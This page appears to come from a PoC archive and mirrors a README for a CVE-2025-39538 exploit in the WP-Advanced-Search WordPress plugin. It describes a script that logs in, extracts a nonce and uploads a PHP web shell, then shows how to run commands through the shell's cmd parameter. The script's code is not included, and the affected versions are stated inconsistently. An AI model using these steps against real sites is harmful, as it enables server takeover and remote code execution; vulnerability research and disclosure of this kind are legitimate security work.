Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-39538 PoC — WordPress WP-Advanced-Search plugin <= 3.3.9.4 - Arbitrary File Upload Vulnerability

Source
https://github.com/Nxploited/CVE-2025-39538
Associated Vulnerability
Title:WordPress WP-Advanced-Search plugin <= 3.3.9.4 - Arbitrary File Upload Vulnerability (CVE-2025-39538)
Description:Unrestricted Upload of File with Dangerous Type vulnerability in Mathieu Chartier WP-Advanced-Search wp-advanced-search allows Upload a Web Shell to a Web Server.This issue affects WP-Advanced-Search: from n/a through <= 3.3.9.4.
Description
WordPress WP-Advanced-Search <= 3.3.9.3 - Arbitrary File Upload Vulnerability
Readme

# 🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Arbitrary File Upload

**CVE-2025-39538**  
**Published:** 2025-04-16  
**Vulnerability Type:** Arbitrary File Upload (Unrestricted Upload of File with Dangerous Type)  
**Affected Plugin:** WP-Advanced-Search by Mathieu Chartier  
**Affected Versions:** All versions up to and including 3.3.9.3

This vulnerability allows an authenticated attacker to upload a malicious PHP file (such as a web shell) to the server using the import functionality provided by the plugin. The uploaded file is placed under the WordPress uploads directory and could lead to remote code execution.

🧱 Upload path:
```
wp-content/uploads/2025/04/
```

---

## ⚙️ About the Exploit Script

This Python script performs the following actions:
1. Logs into the WordPress site using provided credentials.
2. Extracts the required `wp_advanced_search_up_nonce` from the import/export admin page.
3. Uploads a web shell (PHP file) via a crafted POST request.

---

## 🚀 Usage

```bash
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

```

### 🖥️ Example Output:
```
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
```

---
## 🐚 Using the Uploaded Shell

After the upload, you can access your shell like this:

```
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
```

Replace `whoami` with any Linux command you want to execute, for example:
- `id` — shows current user ID.
- `pwd` — shows current directory.
- `ls` — lists files.
## ⚠️ Disclaimer
---
This tool is intended for **educational and authorized security testing** purposes only.  
The author is **not responsible** for any misuse or damage caused by this script.

---

_**By: Nxploited | Khaled Alenazi**_
File Snapshot

 [4.0K]  /data/pocs/5b7af00c26cd7c3b0a970e72dce34af48b81dea9
├── [3.0K]  CVE-2025-39538.py
├── [1.1K]  LICENSE
├── [2.3K]  README.md
└── [  24]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →